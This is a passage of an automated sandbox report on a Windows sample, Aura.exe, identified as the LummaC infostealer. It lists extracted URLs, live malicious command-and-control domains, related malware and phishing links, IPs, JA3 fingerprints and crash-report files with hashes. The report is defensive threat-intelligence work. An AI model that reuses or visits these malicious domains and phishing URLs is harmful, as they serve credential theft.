https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web.telegram.org	Aura.exe, 00000004.00000003.1210182330.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210154351.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://featureccus.shop/bdMAn	Aura.exe, 00000004.00000002.2440401079.00000000012C3000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.2052362967.00000000012C0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.7.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Aura.exe, 00000004.00000003.1312763659.0000000003B23000.00000004.00000800.00020000.00000000.sdmp	false		high
https://menuedgarli.shopA	Aura.exe, 00000004.00000002.2439712146.000000000122C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20	Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web.telegram.orgX-Frame-OptionsALLOW-FROM	Aura.exe, 00000004.00000003.1210324639.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210182330.0000000001267000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	false		high
https://menuedgarli.shop/	Aura.exe, 00000004.00000003.1340998626.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Aura.exe, 00000004.00000003.1311356067.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Aura.exe, 00000004.00000003.1312763659.0000000003B23000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	Aura.exe, 00000004.00000003.1313423656.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mrodularmall.top/	Aura.exe, 00000004.00000003.2052300307.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000002.2440502080.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.48.1	mrodularmall.top	United States	13335	CLOUDFLARENETUS	false
104.21.16.1	menuedgarli.shop	United States	13335	CLOUDFLARENETUS	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1636536
Start date and time:	2025-03-12 21:41:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Aura.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/6@4/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 18 Number of non-executed functions: 142
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.230.12, 40.126.31.67, 2.16.185.191, 4.175.87.197
Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobvmssprdcus03.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Aura.exe, PID 7864 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:42:14	API Interceptor	8x Sleep call for process: Aura.exe modified
16:42:18	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	ySUB97Jq80.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.shlomi.app/9rzh/
	hQaXUS5gt0.exe	Get hash	malicious	FormBook	Browse	www.newanthoperso.shop/3nis/
	6nA8ZygZLP.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	UhuGtHUgHf.exe	Get hash	malicious	FormBook	Browse	www.enoughmoney.online/z9gb/
	Bill_of_Lading_20250307_pdf.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	Stormwater Works Drawings Spec.js	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	Shipment Delivery No DE0093002-PDF.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/tking3/five/fre.php
	Remittance_CT022024.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/fix/five/fre.php
	http://microsoft-sharepoint4543464633.pages.dev/index-2jc93/	Get hash	malicious	HTMLPhisher	Browse	microsoft-sharepoint4543464633.pages.dev/index-2jc93/
	install.exe	Get hash	malicious	Babadeda	Browse	api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated
104.21.16.1	J8bamK92a3.exe	Get hash	malicious	FormBook	Browse	www.play-vanguard-nirvana.xyz/egs9/?9r=2m/uVQwqKH2EIWlawszTKzvIepBfVH/HI19qzylF05nDLsWuBLn1pb4DiFDKEzYOkwPMwL8bVA==&vZR=H2MpG0p
	0t7MXNEfCg.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/n61y/?UPV=BOlfS7N9ZWkGRIMRgNC6B6+WUTyM673eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBBYPYz0JSQDMkWzhvpNbFnW2/OcjAWw==&YrV=FlsDgRMx
	0IrTeguWM7.exe	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/ftbq/
	Shipping Document.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/6m32/
	Payment Record.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	Invoice Remittance ref27022558.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/
	ujXpculHYDYhc6i.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sss2/five/fre.php
	368c6e62-b031-5b65-fd43-e7a610184138.eml	Get hash	malicious	HTMLPhisher	Browse	ce60771026585.oakdiiocese.org/p/298?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
	http://orico-rapaciid.xqyrr.cn/eorico/login/	Get hash	malicious	Unknown	Browse	orico-rapaciid.xqyrr.cn/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	M1gP5m86Gn.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	ca703fd579bbcee73544b9b37f8a6469.bin.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	DEVM24-clean.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	kumori.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	ShadowLoader.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	TEDGRQXB.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Nexol.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	biyhoksefdad.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	YuQuLoader.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	Aura.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
menuedgarli.shop	DEVM24-clean.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
menuedgarli.shop	kumori.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
mrodularmall.top	noypjksdaw.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	x1D44JHWDf.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	DEVM24-clean.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	ScreenSync.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
	vktyhkakwdrg.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	dawothjkjad.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	dawothjkjad.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	YuQuLoader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	Aura.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	SecuriteInfo.com.Win32.MalwareX-gen.1567.5483.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	cvf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	cvf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Payment_Advise.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	4500149631.vbe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	M1gP5m86Gn.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	ca703fd579bbcee73544b9b37f8a6469.bin.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	DEVM24-clean.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	WizClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	kumori.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	ShadowLoader.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
CLOUDFLARENETUS	https://t.co/AK68K9SelA	Get hash	malicious	HTMLPhisher	Browse	162.159.140.237
	https://bitly.cx/UnluS	Get hash	malicious	Unknown	Browse	188.114.96.3
	Confidentiality Agreement#673409765.pdf	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	188.114.97.3
	https://3eirjeka09wpomwue.pages.dev/?A7DfyjrqmSH=support@pivotworks.com&u6pQ2hoZu%C2%A0&c=E,1,F0mRDOtTwfU2VOcUC63lqaXu_vGNZSrMHfX65dq8yqzEYqva-4o5jzBSHtcoRvb46gYk8Ze6dDwjiIrFae0o9EdeLqOQaTFCNwH3BxXIyHkJvW4Zvw,,&typo=1)	Get hash	malicious	Unknown	Browse	104.22.27.101
	d7af94ec-2d8a-47b3-a705-8b2bef0fdd85.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://www.canva.com/design/DAGhc7_0hcE/hgb_at1RBcHJUDkqEWuiaw/view?utm_content=DAGhc7_0hcE&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h6c02bf3a02	Get hash	malicious	Unknown	Browse	188.114.96.3
	Jenny C. Whitfield shared Jenny@NAC Mechanical Services LLC with you.msg	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://sharpayappindex.sharefile.com/public/share/web-s1433e7d4d36a481491c3d36d25011800	Get hash	malicious	Unknown	Browse	172.67.74.152
	remittance detail_03.12.2025_RECIPIENT_DOMAIN_NAME}00990__098.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://gamma.app/docs/New-PDF-Document-Received-zcjtl86ps92t8zt?mode=present%23card-ebha6s778xi343r	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	172.67.160.80
CLOUDFLARENETUS	https://t.co/AK68K9SelA	Get hash	malicious	HTMLPhisher	Browse	162.159.140.237
	https://bitly.cx/UnluS	Get hash	malicious	Unknown	Browse	188.114.96.3
	Confidentiality Agreement#673409765.pdf	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	188.114.97.3
	https://3eirjeka09wpomwue.pages.dev/?A7DfyjrqmSH=support@pivotworks.com&u6pQ2hoZu%C2%A0&c=E,1,F0mRDOtTwfU2VOcUC63lqaXu_vGNZSrMHfX65dq8yqzEYqva-4o5jzBSHtcoRvb46gYk8Ze6dDwjiIrFae0o9EdeLqOQaTFCNwH3BxXIyHkJvW4Zvw,,&typo=1)	Get hash	malicious	Unknown	Browse	104.22.27.101
	d7af94ec-2d8a-47b3-a705-8b2bef0fdd85.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://www.canva.com/design/DAGhc7_0hcE/hgb_at1RBcHJUDkqEWuiaw/view?utm_content=DAGhc7_0hcE&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h6c02bf3a02	Get hash	malicious	Unknown	Browse	188.114.96.3
	Jenny C. Whitfield shared Jenny@NAC Mechanical Services LLC with you.msg	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://sharpayappindex.sharefile.com/public/share/web-s1433e7d4d36a481491c3d36d25011800	Get hash	malicious	Unknown	Browse	172.67.74.152
	remittance detail_03.12.2025_RECIPIENT_DOMAIN_NAME}00990__098.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://gamma.app/docs/New-PDF-Document-Received-zcjtl86ps92t8zt?mode=present%23card-ebha6s778xi343r	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	172.67.160.80

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	baseball-lineup-21.xls	Get hash	malicious	Unknown	Browse	104.21.48.1 104.21.16.1 149.154.167.99
	baseball-lineup-21.xls	Get hash	malicious	Unknown	Browse	104.21.48.1 104.21.16.1 149.154.167.99
	signed contract 01.xls	Get hash	malicious	Unknown	Browse	104.21.48.1 104.21.16.1 149.154.167.99
	PAYMENT ADVICE.xls	Get hash	malicious	Unknown	Browse	104.21.48.1 104.21.16.1 149.154.167.99
	Inquiry.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.48.1 104.21.16.1 149.154.167.99
	Document.xls	Get hash	malicious	Unknown	Browse	104.21.48.1 104.21.16.1 149.154.167.99
	HAWKE ORDER 12.3.2025.pdf (#U007e135 KB).xls	Get hash	malicious	Unknown	Browse	104.21.48.1 104.21.16.1 149.154.167.99
	Purchase Inquiry.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.48.1 104.21.16.1 149.154.167.99
	ORDEM DE COMPRA.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.48.1 104.21.16.1 149.154.167.99
	NB NT19901102W.xls	Get hash	malicious	Unknown	Browse	104.21.48.1 104.21.16.1 149.154.167.99

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Aura.exe_f41d6ba581e1ba5a896754c8db9d22e26dd8665_f87db1fa_5a1e1b65-4ce1-4184-b53b-1fac494c0505\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7125798699211763
Encrypted:	false
SSDEEP:	96:HTGF39Karsah+oI7RA6tQXIDcQvc6QcEVcw3cE/X+HbHg/TgJ3YOZUXOyK/ZAX/O:i1jrh0BU/wj/+zuiFiZ24IO8S
MD5:	DD11E1B3BEC348A40B07CBCF08684E24
SHA1:	791AA44721E6C9A1840EFC240218A2B47231FDE2
SHA-256:	8AAFD9A213DDCAED44496529E093C14130885A6A502615738E359039727D64CB
SHA-512:	CECFE2EBAB9B67D17E2804174C332D47034EEBC6B6F2F711F4DC2954A45EA1C2BCE36479F09B41140E332FE15919FCABE4FBAF2C7BDF20CEEEC3483758AA9437
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.2.8.5.7.3.1.8.5.8.1.9.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.2.8.5.7.3.2.2.6.4.4.5.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.1.e.1.b.6.5.-.4.c.e.1.-.4.1.8.4.-.b.5.3.b.-.1.f.a.c.4.9.4.c.0.5.0.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.f.a.a.0.a.e.-.e.4.8.9.-.4.b.a.f.-.8.4.1.7.-.7.4.a.7.c.1.6.5.8.e.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.u.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.8.0.-.0.0.0.1.-.0.0.1.8.-.3.d.f.e.-.a.3.3.a.8.f.9.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.0.9.2.f.3.8.a.9.1.e.8.4.d.d.a.1.7.b.5.7.9.e.d.e.4.7.3.f.d.d.4.0.0.0.0.f.f.f.f.!.0.0.0.0.4.8.3.d.6.d.d.7.6.4.1.2.2.8.f.e.0.e.e.c.2.a.2.e.e.3.e.5.e.8.6.a.d.0.6.a.c.1.8.9.!.A.u.r.a...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.3././.1.1.:.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCBA1.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Mar 12 20:42:11 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	35938
Entropy (8bit):	1.8119238429581601
Encrypted:	false
SSDEEP:	96:5n8QiZZn1MoPcIZurHQRPjT4xi7OUGC76Iu0Zj0DwChsVina+WI5NWIXpCrIBm+Z:K7ZZ1HEwbwOVZ0Dw3mJS+/7LtlFT
MD5:	4FE3C207DCFB43CE28E205719C4976AB
SHA1:	8472D0B25F8114BF31C18DFAC9C150F11B0F8262
SHA-256:	0A1A2C5A1F420186DB68F7B40CC7F6A7951F23239F34B6152A1E733BA372672A
SHA-512:	D72CBE6145DECB6D69851DD0A6A297BF67E8BDC1B5E1ACC8FC3D31155E713542FCC5E75895ADF3BF56719EA1DA4259F0634C4F3887E51F209CA04A00018DFFD5
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........g........................0...............Z...........T.......8...........T...........x....{......................................................................................................eJ......P.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC00.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8376
Entropy (8bit):	3.6959458735254933
Encrypted:	false
SSDEEP:	192:R6l7wVeJhX65x6Y6wSU9Ugmfdrpr789bL0sfqT5m:R6lXJh6/6YdSU9Ugmfd6LnfqQ
MD5:	272EC60D43F39F28CB5101F365C7473B
SHA1:	AAA55046DFD00E3D4B978E6354ABE86516DAF5AF
SHA-256:	E50B88F1FED758DA78E4D476129FE7C5900973AE1F353F66ADEEE14C155F64AD
SHA-512:	967C1DE6EEB8D7FE6A96745C83FAC76A56724EE80E2F86D108EBA1932AB95E3F6004106E8411901E37FDAC0426328433080CE631B00220AC35FE26F20BB28BB3
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC30.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4690
Entropy (8bit):	4.455398755750364
Encrypted:	false
SSDEEP:	48:cvIwWl8zsdJg77aI9oTWpW8VYBEyYm8M4JzdKF5+q8vbdTMAZXd:uIjf3I7ii7VckJzwKbxMAZXd
MD5:	EF4F5EE945761B5D2C47F4E06AE1BE30
SHA1:	1D9BDA24DF0990C73FB7E185012A7A2228AF4DDE
SHA-256:	D3C28CF89E88B7F41C94C6ECF6D184063A3B6F64A0A811E8A31036450C4DB67F
SHA-512:	43DA14CDE1632B469BA5D3BE69E789709CB7271CC26A45773606536AB4F1D775E4DDFEC939426C01FF48A94B6D8CA16D32F1536E39C39F5B66E2BE718666BE7A
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="758144" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469961007965454
Encrypted:	false
SSDEEP:	6144:i+Xfpi67eLPU9skLmb0b4fWSPKaJG8nAgejZQqZaKWFIeC/F1cXGdW1qaEGlNp:NXD94fWlLZQqYgtW2sNp
MD5:	08DE8844216E84494A918549C71BF377
SHA1:	80ECB24B71E1AA552CA79CC7FA19E64602E27533
SHA-256:	57AD1B0DC90AC62359C0A88BE4653ADDC181DA36F7F9F5629AFCAC6D4C97B424
SHA-512:	247075A9AFE93AF4B6F8CBB1FE264D2E72B3F1D0A5D80E7673935CEB1E8EFE913D30A4F6DF0E4932EE2002CECFEF873D05D9001652615408BCC6D513ADD6AF4C
Malicious:	false
Reputation:	low
Preview:	regf:...:....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7wK...............................................................................................................................................................................................................................................................................................................................................{@!C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.1392780919046075
Encrypted:	false
SSDEEP:	768:SPJDoFVSNr0WFRYaiWg7fwLEl99Pd9l+9uPIEcfmsc7O+4:SPBFdNIwIlV9l0utc6
MD5:	9C67B6DA9EB1A12B34EA20B8EF3C34F1
SHA1:	89FD21D84259BFDA33AAA791A76ED121C8567BFC
SHA-256:	D07C94BBF25F2EA3A0BC473723BDE88D142FB2DE38E710C5153AA9CDC33AE6C3
SHA-512:	66020FA8AB96D545CE4F7F28B816F1DF394D2FEA444C5531D456AE2787468BFA3A7681EECBE9A26B6E2BB34D87567CB47DC78EAD1C4811F8C9A66726F60F2438
Malicious:	false
Reputation:	low
